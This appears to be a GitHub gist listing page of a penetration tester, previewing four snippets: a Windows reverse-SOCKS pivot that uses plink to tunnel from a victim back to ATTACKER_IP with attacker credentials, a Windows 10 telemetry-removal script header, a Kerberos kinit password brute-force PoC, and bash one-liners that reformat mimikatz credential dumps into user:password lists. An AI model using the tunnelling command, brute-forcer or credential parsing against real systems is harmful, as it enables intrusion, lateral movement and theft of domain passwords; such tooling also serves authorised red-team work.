Chris King Raikia
Raikia
/ gist:42a10ac031fce4caef7c395a5658ed41
Created
March 5, 2020 20:04
Reverse SOCKS on Windows?
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ATTACKER --> VICTIM | |
| On victim: | |
| plink.exe ATTACKER_IP -p 22 -R 127.0.0.1:1234:VICTIM_IP:9999 -l ATTACKER_USERNAME -pw ATTACKER_PASSWORD | |
| ^ This will SSH to ATTACKER_IP and create port 1234 on ATTACKER_IP that will forward to VICTIM_IP port 9999 | |
| Then on victim again, run microsocks (https://github.com/rofl0r/microsocks, from the same guy who maintains proxychains) | |
| microsocks -i 0.0.0.0 -p 9999 |
Raikia
/ reclaimWindows10.ps1
Created
March 15, 2019 17:20
— forked from alirobe/reclaimWindows10.ps1
This Windows 10 Setup Script turns off a bunch of unnecessary Windows 10 telemetery, bloatware, & privacy things. Not guaranteed to catch everything. Review and tweak before running. Reboot after running. Scripts for reversing are included and commented. Fork of https://github.com/Disassembler0/Win10-Initial-Setup-Script (different defaults). N.…
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ########## | |
| # Tweaked Win10 Initial Setup Script | |
| # Primary Author: Disassembler <disassembler@dasm.cz> | |
| # Modified by: alirobe <alirobe@alirobe.com> based on my personal preferences. | |
| # Version: 2.20.2, 2018-09-14 | |
| # Primary Author Source: https://github.com/Disassembler0/Win10-Initial-Setup-Script | |
| # Tweaked Source: https://gist.github.com/alirobe/7f3b34ad89a159e6daa1/ | |
| # Tweak difference: | |
| # | |
| # @alirobe's version is a subset focused on safely disabling telemetry, some 'smart' features and 3rd party bloat ... |
Raikia
/ kinit_brute.sh
Created
July 27, 2017 21:47
— forked from ropnop/kinit_brute.sh
A quick tool to bruteforce an AD user's password by requesting TGTs from the Domain Controller with 'kinit'
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Title: kinit_brute.sh | |
| # Author: @ropnop | |
| # Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller | |
| # The script configures the realm and KDC for you based on the domain provided and the domain controller | |
| # Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf | |
| # Only tested with Heimdal kerberos (error messages might be different for MIT clients). Install: $ apt-get install heimdal-clients | |
Raikia
/ One-liner Mimikatz Parser
Last active
October 1, 2020 01:37
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Assuming you have a mimikatz dump named "mimikatz_dump.txt", I made these bash one-liners that will reformat the mimikatz output to "domain\user:password" | |
| First, before using these parsers, run: "dos2unix mimikatz_dump.txt" | |
| Mimikatz 1.0: | |
| cat mimikatz_dump.txt | grep -P '((Utilisateur principal)|(msv1_0)|(kerberos)|(ssp)|(wdigest)|(tspkg))\s+:\s+.+' | grep -v 'n\.' | sed -e 's/^\s\+[^:]*:\s\+//' | sed -e 's/Utilisateur principal\s\+:\s\+\(.*\)$/\n\1/' | sort -u | |
| Mimikatz 2.0 (unfortunately, you must "apt-get install pcregrep" because reasons): |